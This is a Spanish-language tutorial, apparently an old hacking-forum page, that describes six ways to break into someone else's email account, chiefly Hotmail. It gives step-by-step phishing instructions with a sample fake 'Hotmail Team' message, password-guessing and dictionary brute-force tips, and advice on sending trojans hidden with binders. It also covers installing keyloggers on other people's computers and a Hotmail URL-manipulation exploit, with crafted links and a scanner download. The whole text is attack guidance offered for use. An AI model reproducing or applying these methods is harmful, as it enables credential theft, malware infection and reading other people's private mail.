1ª Manera de hackear una cuenta de correo--Exploits-- Un exploit es un código html que simula un aviso de hotmail diciendo que cambies de contraseña (por el motivo que sea) y que escribas tu correo con tu clave en el. Total que al responder ese e-mail le envias al tío que te lo mandó tú clave y dirección de correo.. Te pongo unos Exploits abajo. Lo que tienes que hacer (despues de descomprimirlos) es doble click en él. Te aparece la apariencia del exploit. Si te gusta vas a la barra de tareas- ver - código fuente y te aparece el block de notas con un código. Donde pone "aqui tu correo" o simplemente, aparezca un email (@hotmail) escribes tu correo. Luego copias el código completo y lo pegas donde se escribe el mensaje de correo. Es importante que tengas activada una casilla que permita el código html para que el exloit se vea(de lo contrario, el destinatario o víctima solo verá el código). En el asunto pones lo que creas que haga referencia al Xploit (aviso de hotmail, por ejemplo) y lo envias. Para darle realismo intenta enviarlo anonimamente. Para eso hay páginas en internet que envian e-mails anónimos o con el subject que tu quieras. Tambien existen programas. En la Superguía del hacker te explica cómo enviarlos a través de telnet. Lo malo de enviar emails de esta forma es que suelen ir a la carpeta de correo no deseado, por eso aconsejo crear un email tipo ofertas_hotmail@hotmail.com, noticias@gmail.com, nuevos_servicios@yahoo.com o otros parecidos e enviarlos desde ahí, así te aseguras de que llegan.. A continuación pongo unos exploits para hotmail: Exploit 1 Exploit 2 Exploit 3 Exploit 4 Exploit 5 Exploit 6 Exploit 7 Exploit 8 Exploit 9. Es .posible que alguno no funcione por culpa de la caida de algún Smtp. Es recomedable que busques nuevos exploits, incluso es fácil crearlos si sabes un poco de htm, pues los servidores que ofrecen espacio web te dan la oportunidad de hacer tus propios formularios. Los que realmente funcionan a la perfeción son los de php, en los que te haces una cuenta con espacio web gratuito(intenta que sea sin publicidad para no levantar sospechas), subes una página con un formulario con las cajas de email y contraseña, el logo de hotmail, y un poco de ingenieria social y listo, kien rellene ese formulario te envia un correo a tu cuenta con su clave de aceso y su email 2ª Manera de hackear hotmail--Sin Exploits-- Le mandas un mensaje a manolo@hotmail.com que es el fulano que quieres hackear, por ejemplo. Estimado usuario de Hotmail manolo@hotmail.com Lamentamos informarle que hemos detectado insistentes ataques contra varias cuentas de correo entre las cuales está su cuenta manolo@hotmail.com. Los ataques usan el método de prueba y error (hack-hack) para el cual son particularmente vulnerables las claves que, como la suya, son palabras pronunciables. Es por eso que lo alentamos a que con urgencia solicite una nueva clave de nuestro servidor de password, escribiendo un mensaje vacío a keyserver@hotmail.com. Dentro de los próximos minutos recibirá una clave automáticamente generada por nuestro KeyBot, y para asegurar que nadie más que el legítimo usuario la conozca, usted mismo deberá cambiarla dentro de las 48 horas siguientes. Lamentando los inconvenientes que pueda ocasionarle esta medida de seguridad adicional, nos despedimos de usted asegurándole que estamos esforzándonos al máximo para hacer de Hotmail un servidor de correos seguro y confiable. Atentamente The Hotmail Team Luser, entonces envía su mail a keyserver@hotmail.com y al poco tiempo recibe una respuesta: Gracias por colaborar con nuestro esquema de seguridad. La clave que nuestro Keybot ha generado automáticamente es: 4ky32zq1wp Por razones de seguridad, la clave caducará indefectiblemente en 48 horas. Usted deberá ingresar a su correo Hotmail antes del plazo estipulado y cambiar la clave desde el menú Opciones. Gracias por hacer de Hotmail un lugar más seguro The Hotmail Team. Keyserver@hotmail.com es tu cuenta de hotmail. En resumen, le escribes a un tipo que envie un e-mail para que cambie su contraseña, te llega un mensaje en blanco y tu escribes la contraseña que kieras. El la cambia y tu ya sabes su contraseña. 3ª Manera de hackear hotmail--Brute force (hack-hack, prueba y error)-- Si se tiene idea del nombre de: a) la mascota de la víctima, b) el apodo que le dieron sus amigos reales, c) la calle, ciudad o región donde vive, d) la fecha de cumpleaños, e) el nombre del novio/a , f)SU MOVIL o el de su hermano, g) 123456 (es la contraseña mas utilizada, un 5% la usan).. Vas probando haber si aciertas. Parece una tontería pero puede funcionar y en un 10% o más de los casos funciona Este debe de ser el método por el que debes de empezar, pues es el más rápido, pero tampoco esteas toda la noche... Si se hace desde una consola telnet (mail.hotmail.com:110) se puede automatizar el proceso poniendo un hackeador que use un diccionario 4ª Manera de sacar contraseñas--Troyano-- Un día, bonita77@gmail.com recibe en su cuenta un mail como este: "Hola bonita, soy un tipo re-divertido, nos conocimos los otros dias en el chat... te envío unas fotos mías, ese que surfea en la cresta de la ola soy yo, en las playas de Australia, salí segundo en el campeonato mundial de 1999 en Perth. Como es un slide-show con 4 imágenes, va todo compactado en un .exe por favor escanealo antes de correrlo porque uno nunca sabe qué puede pasar con un archivo EXE mientras está en el servidor de correos. Ah, casi me olvido, mandame tu foto y dame tu ICQ. Besos... peter@yahoo.es" Escanealo todo lo que quieras, Bonita, estoy seguro que Peter tiene bien claro que de la manera en que armó el paquete ningún antivirus ni antitroyano lo detecta. Luego se sentará a esperar que lo ejecutes, el troyano puede enviarle un mail avisándole que Bonita ha sido infectada (para ello debe contar con un plug-in como el ButtTrumpet instalado en el servidor de BackOrifice, por ejemplo). Una vez que el troyano está instalado, Peter tiene casi total control sobre el host que Bonita usa para conectarse, puede loggear las teclas apretadas, puede ver los password que estén almacenados, reiniciar Windows, cambiar claves en el Registry, lo que se le ocurra, incluyendo averiguar los pares username-password de todas las cuentas a las que la víctima acceda. O si no no te compliques la vida, mandale un troyano por messenger para despistar utiliza un binder para poder juntar un archivo(un juego, fotos...) al server del troyano y no levantar sospechas. Pásate por la sección troyanos donde te explicamos mejor su funcionamiento 5ª Manera de conseguir un password--usando su ordenador-- Si tienes aceso a su ordenador le instalas un keylogger (en los cibers te haces con muchas cuentas) y despues de que escriba su contraseña pues te queda registrado todo lo que tecleo en un archivo. Hay keyloggers que incluso te envian el archivo atu cuenta de correo. Tambien si esta para que se inicie automaticamente programas como openpass.exe te rebelan lo que se oculta debajo de los asteriscos. 6ª Manera de entrar en una cuenta de correo—Aprovechando una vulnerabilidad, agujero o bug. exploit-- Este exploit de root-core (http://www.root-core.com/) permite ver ciertos mensajes de cuentas de correo de hotmail conociendo el nombre de usuario. Tres Pasos para ver algunos correos en Hotmail (Probado con Internet Explorer 5) Para ver completamente un mensaje de alguna cuenta de hotmail hay que hacer lo siguiente: 1. Acceder a Hotmail normalmente con tu nombre de usuario o con cualquier otro que conozcas. 2. Utiliza un link como este para ver un mensaje específico de un usuario específico: http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin % 2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26l en% 3d9999999999999999%26raw%3d0%26login%3dusername%26 domain%3dhotmail% 2ecom&hm___fl=attrd&domain=hotmail.com o bien: http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin % 2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26l en% 3d9999999999999999%26raw%3d0%26login%3dusername%26 domain%3dhotmail% 2ecom&hm___fl=attrd&domain=hotmail.com De ese link cambia los siguientes valores: MSG943322803%2e16 (Número de mensaje, es símplemente un contador. %2e equivale a "." ) username (El nombre de usuario de la cuenta de correo que quieras espiar) Ejemplos de números de mensaje: MSG943322803%2e1 MSG943322803%2e22 MSG943322803%2e149 (borra "%26raw%3d0" si quieres ver el correo como una ventana normal de hotmail en lugar de ver el mensaje como texto sin formato) (borra "&hm___fl=attrd&domain=hotmail.com" si no quieres que aparezca el frame superior de hotmail) Nota. Todo lo parecido a "%2e", etc. son códigos ascii hexadecimal. Debes utilizarlos en lugar de los caracteres normales. Aquí tienes una lista completa: http://www.december.com/html/spec/ascii.html 3. Ya está. Si introduces un número de mensaje correcto puedes leer ese determinado mensaje (siempre que exista ese mensaje claro (Comprueba el método antes con tus propios mensajes en hotmail para saber como funciona). Como teclear cada vez un número de mensaje es un trabajo bastante pesado, los chicos de root core han creado una pequeña utilidad para escanear automáticamente un rango de mensajes de un usuario específico. La puedes bajar aquí: http://rootcore.can-host. com/files/hobo04r2.zip Para ver los mensajes necesitas trabajar con IExplorer y debes haber entrado previamente en tu cuenta de Hotmail. Prueba el fallo en estos links de prueba: (1. Entra en tu cuenta de hotmail, 2. Copia estos links y pruebalos en tu navegador) Ejemplo texto sin formato (no se pueden ver los attach directamente) http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin % 2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702% 26len% 3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%2 6login% 3djokutesti99%26domain%3dhotmail% 2ecom&hm___fl=attrd&domain=hotmail.com ventana del buzón normal: (puedes ver imágenes, etc. ) http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin % 2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702% 26len% 3d9687%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dj okutesti99%26domain% 3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com Puedes ver también mensajes eliminados. Si borras un mensaje en hotmail y después vacías la papelera, el mensaje es visible usando este tipo de link durante unas 6-12 horas aproximadamente. Correcciones y más cosas: Cambios en el link: Eliminar parámetro: %26disk%3d64%2e4%2e36%2e68_d1577 Este parámetro causa un error en algunos casos: "Due to an internal error your request cannot be processed. We apologize for the inconvenience. Please try again later." Solución. Eliminar este parámetro del link, no es necesario. Cambios en los parámetros: %26start%3d9702%26len%3d9687 en lugar de %26start%3d1%26len%3d9999999999999999 Este parámetro determina justo el comienzo y la longitud visualizable del email. Si pones el valor demasiado pequeño el email se verá justo ese número de carácteres. Si el usuario no tiene ese mensaje en su buzón, se obtiene este mensaje de error: " Subject: Unable to locate message Content-Type: text/plain; charset=us-ascii An error has prevented from locating the message." Si el usuario no existe, se obtiene una página completamente en blanco. Si existe algún error en la sintaxis del link normalmente aparecerá la página de acceso de hotmail pidiendo de nuevo el password. Si tienes dificultades para ver mensajes comprueba que has introducido correctamente el número de mensaje. (MSGXXXXXXXXX.YYY) El valor Y puede ser oscilar entre 0-nnn. nnn puede ser lo que sea, dependiendo del número de mensajes en ese buzón. 100, 200, etc. Comprueba que la sintaxis del link es correcta. Comprueba que has entrado en tu cuenta de Hotmail. Prueba a cambiar el servidor. En lugar de pv2fd.pav2.hotmail , intentalo con lw14fd.law14.hotmail. Si los links de prueba de Root Core ya no son operativos, sin duda es debido a que hotmail ya ha solucionado el problema.